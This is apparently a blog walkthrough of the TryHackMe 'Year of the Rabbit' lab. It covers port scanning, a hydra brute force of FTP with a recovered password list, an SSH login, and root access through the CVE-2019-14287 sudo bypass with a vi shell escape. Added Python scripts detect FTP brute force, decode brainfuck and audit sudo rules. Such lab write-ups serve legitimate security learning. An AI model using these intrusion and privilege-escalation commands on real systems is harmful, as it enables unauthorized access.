WriteUp — THM Year of the Rabbit

Jari Laurila
4 min read · Nov 8, 2020


Can you hack into the Year of the Rabbit box without falling down a hole (Please ensure your volume is turned up!)

This is a writeup for TryHackMe room Year of the Rabbit.


Reconnaissance

Start with web server enumeration.

nmap -sC -sV -p- 10.10.138.222
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 17:59 EET
Nmap scan report for 10.10.138.222
Host is up (0.054s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

The web root only serves the Apache default page, so I enumerate the web server further with gobuster. While I wait for gobuster, it’s time to get Rickrolled by looking at /assets. But I also discover something hidden in style.css:

/* Nice to see someone checking the stylesheets.
Take a look at the page: /sup3r_s3cr3t_fl4g.php
*/

Navigating to that page gets me Rickrolled again. There is nothing in the HTML except a YouTube link to the same video. After enumerating for hours with gobuster, nikto etc., I finally focus more on /sup3r_s3cr3t_fl4g.php. Maybe I can add some parameters to it? Taking a look at the raw HTTP response, I notice that it’s actually a redirect!

HTTP/1.1 302 Found
Date: Sun, 08 Nov 2020 08:24:03 GMT
Server: Apache/2.4.10 (Debian)
Location: intermediary.php?hidden_directory=/WExYY2Cv-qU
Content-Length: 0
Content-Type: text/html; charset=UTF-8

Going to that directory again gets me Rickrolled. Maybe I really need to turn JavaScript off, so I install NoScript and try again. This time it’s different:

Hot Babe is the classic Lenna test image. There must be something hidden inside, so let’s take a look with the classic tools.

Exiftool and binwalk return nothing, but strings gets me this:

Eh, you’ve earned this. Username for FTP is ftpuser
One of these is the password:
Mou****%QK8sr
1618****hw1M
A56****1s02u
vTFb***&Nmu?
...

I copy the strings to a file and fire up hydra:

hydra -l ftpuser -P passwords 10.10.32.7 ftp
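The hydra run above is exactly the pattern a defender wants to catch: many FAIL LOGIN events for one user from one client in a short window, followed by an OK LOGIN. The script below is an added example, not part of the original writeup and not a tool from the room: it parses vsftpd-style login log lines (the sample lines are constructed for this example; the log shape `... [pid N] [user] FAIL LOGIN: Client "ip"` is vsftpd's, but the timestamps, pids and client addresses are made up) and raises one alert per (client, user) pair that crosses a failure threshold inside a sliding window, marking it as a likely successful guess when a login later succeeds.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# vsftpd writes login results to its log in this shape (the sample lines below are
# constructed for this example, not taken from the box):
#   Sun Nov  8 08:24:03 2020 [pid 1234] [ftpuser] FAIL LOGIN: Client "10.10.14.5"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"$'
)


def parse_line(line):
    """Return (timestamp, user, result, client_ip) for a login line, else None."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("user"), m.group("result"), m.group("ip")


def detect_bruteforce(lines, threshold=10, window_seconds=60):
    """Flag each (client, user) pair that reaches `threshold` failed logins inside a
    sliding window of `window_seconds`; a later OK LOGIN for the same pair is recorded
    as a likely successful guess (a wordlist run like the one above fits this pattern)."""
    failures = defaultdict(deque)  # (ip, user) -> timestamps of recent FAIL LOGINs
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # CONNECT lines, transfers, etc. are not login events
        ts, user, result, ip = parsed
        key = (ip, user)
        if result == "FAIL":
            window = failures[key]
            window.append(ts)
            while window and (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= threshold and key not in alerts:
                alerts[key] = {"ip": ip, "user": user, "failures": len(window),
                               "first_seen": window[0], "succeeded": False}
        elif key in alerts:  # OK LOGIN after a burst of failures
            alerts[key]["succeeded"] = True
            alerts[key]["success_at"] = ts
    return list(alerts.values())


def _line(sec, pid, user, result, ip):
    return f'Sun Nov  8 08:24:{sec:02d} 2020 [pid {pid}] [{user}] {result} LOGIN: Client "{ip}"'


# Constructed sample log: twelve guesses from one client in twelve seconds, then a hit,
# plus one unrelated failure and a non-login line that the parser must skip.
SAMPLE_LOG = (
    ['Sun Nov  8 08:23:59 2020 [pid 1233] CONNECT: Client "10.10.14.5"']
    + [_line(s, 1234 + s, "ftpuser", "FAIL", "10.10.14.5") for s in range(12)]
    + [_line(12, 1250, "ftpuser", "OK", "10.10.14.5"),
       _line(30, 1260, "anonymous", "FAIL", "10.10.14.99")]
)

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        status = "SUCCEEDED at %s" % alert["success_at"] if alert["succeeded"] else "ongoing"
        print(f'{alert["ip"]} -> {alert["user"]}: {alert["failures"]} failures from '
              f'{alert["first_seen"]:%H:%M:%S}, {status}')
```

Point `detect_bruteforce` at the lines of a real vsftpd log (or a log-shipping pipeline) and tune `threshold` and `window_seconds` to the service; a successful login immediately after a burst is the event worth paging on, because it means the wordlist contained the real password.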

In a couple of seconds I get the right password and proceed to log in to the FTP server. There is a single file on the server containing some brainfuck. Luckily, a day ago I did another writeup for a room with brainfuck, so I know where to look!

cat Eli\'s_Creds.txt
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <
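Brainfuck has only eight commands, so decoding a file like the one above needs nothing more than a small interpreter. The one below is an added example, written for this writeup rather than taken from the room or from any existing tool: it ignores every non-command character (the spaces and line breaks in Eli's_Creds.txt included), pre-pairs the loop brackets, wraps cells modulo 256 like the usual implementations, and returns the program's output as a string. The sample program it ships with is constructed for the test and simply prints "AB"; run the script with the credentials file as its argument to decode the real message.

```python
import sys


def run_brainfuck(program, tape_size=30000):
    """Interpret `program` and return everything it prints as a str.

    Any character other than the eight brainfuck commands is ignored, so a file
    padded with spaces and newlines (like Eli's_Creds.txt above) can be fed in as-is.
    """
    code = [c for c in program if c in "<>+-.,[]"]

    # Pair every '[' with its ']' once up front so loop jumps are O(1).
    jump, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at command {i}")
            start = stack.pop()
            jump[start], jump[i] = i, start
    if stack:
        raise ValueError(f"unmatched '[' at command {stack[-1]}")

    tape = bytearray(tape_size)  # cells wrap modulo 256, as common implementations do
    ptr = pc = 0
    out = []
    while pc < len(code):
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            tape[ptr] = 0  # no stdin for a decode-only run; ',' reads EOF as 0
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        if not 0 <= ptr < tape_size:
            raise IndexError(f"data pointer left the tape at command {pc}")
        pc += 1
    return "".join(out)


# Constructed sample: 8*8 = 64, then +1 -> 'A', +1 -> 'B'. The spaces are ignored.
SAMPLE_PROGRAM = "+++++ +++[> +++++ +++<- ]>+.+ ."

if __name__ == "__main__":
    # Usage: python3 bf.py Eli\'s_Creds.txt   (reads the program from the file)
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PROGRAM
    print(run_brainfuck(src))
```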

Decoding this message I get eli’s password, so it’s time to log in with SSH. There is a message to greet me at login:

ssh eli@10.10.32.7          
eli@10.10.32.7's password:
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"END MESSAGE

/home/gwendoline has the user flag, but it’s not readable. Let’s try to find the hiding place:

find / -iname "*s3cr3t*" 2>/dev/null
/var/www/html/sup3r_s3cr3t_fl4g.php
/usr/games/s3cr3t

There is a hidden file in that directory:

cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just __REDACTED__
Honestly!
Yours sincerely
-Root

We can log in as gwendoline with this password and grab the user flag.

Privesc

The first thing to do once you know a user’s password is to check sudo:

sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt

Looking at the vi entry on GTFOBins, it’s really easy to get root access and grab the flag. But the !root entry in sudo probably means that this system has the CVE-2019-14287 vulnerability, so we need to execute the command as:

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

BOOM! We are root and can grab the flag.
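The rule `(ALL, !root) NOPASSWD: /usr/bin/vi ...` combines three weaknesses: a runas list that tries to subtract root from ALL (the negation is what CVE-2019-14287 bypasses on sudo versions before 1.8.28, and naming the allowed runas user explicitly avoids the problem on any version), no password prompt, and an editor that GTFOBins lists as a shell escape. The checker below is an added example written for this writeup, not a tool from the room or from the sudo project: it parses the permission lines of `sudo -l` output (the box's output above is reused as sample input), reports each of those weaknesses, and shows a constructed `sudoedit` rule that passes clean. The `SHELL_ESCAPE_BINS` list is a short illustrative subset, not GTFOBins itself.

```python
import re
from dataclasses import dataclass

# Interpreters and editors that can run a shell or write arbitrary files once they
# execute under sudo (GTFOBins catalogues many more; this list is illustrative).
SHELL_ESCAPE_BINS = {"vi", "vim", "view", "nano", "less", "more", "man", "find",
                     "awk", "perl", "python", "python3"}

# One permission line as printed by `sudo -l`:  (runas) TAG: command [args]
RULE_RE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$"
)


@dataclass
class Finding:
    rule: str
    issues: list


def analyse_rule(line):
    """Return a Finding for one `sudo -l` permission line, or None if it is not one."""
    m = RULE_RE.match(line.strip())
    if m is None:
        return None
    # "(user : group)" -> only the user part matters for the checks below
    users = [u.strip() for u in m.group("runas").split(":")[0].split(",")]
    tags, cmd = m.group("tags"), m.group("cmd")
    binary = cmd.rsplit("/", 1)[-1]
    issues = []
    if "ALL" in users and any(u.startswith("!") for u in users):
        issues.append("runas is ALL minus an exclusion: the '!' does not restrict the "
                      "target uid reliably (CVE-2019-14287, fixed in sudo 1.8.28); "
                      "name the allowed runas user explicitly instead")
    if "NOPASSWD" in tags:
        issues.append("NOPASSWD: no credential prompt, so a stolen session is enough")
    if cmd == "ALL":
        issues.append("command ALL: any program may be run as the runas user")
    elif binary in SHELL_ESCAPE_BINS:
        issues.append(f"{binary} offers a shell/file escape (see GTFOBins); for editing "
                      "a single file grant sudoedit on that path instead")
    return Finding(line.strip(), issues)


def scan_sudo_l(output):
    """Run analyse_rule over `sudo -l` output and keep only rules with issues."""
    findings = []
    for line in output.splitlines():
        f = analyse_rule(line)
        if f is not None and f.issues:
            findings.append(f)
    return findings


# The sudo -l output from the box, as shown above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
"""

# A constructed replacement rule (as sudo -l would print it) that triggers nothing.
HARDENED_RULE = "(gwendoline) sudoedit /home/gwendoline/user.txt"

if __name__ == "__main__":
    for f in scan_sudo_l(SAMPLE_SUDO_L):
        print(f.rule)
        for issue in f.issues:
            print("  -", issue)
    print("hardened rule issues:", analyse_rule(HARDENED_RULE).issues)
```

Run it against `sudo -l` output collected from each host (or against visudo-rendered rules) as part of a hardening review; on this box the right fix is simply to delete the rule, since gwendoline can already edit her own file without sudo, and to upgrade sudo past 1.8.28 regardless.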

Written by Jari Laurila

CTO by day, learning cybersecurity by night.
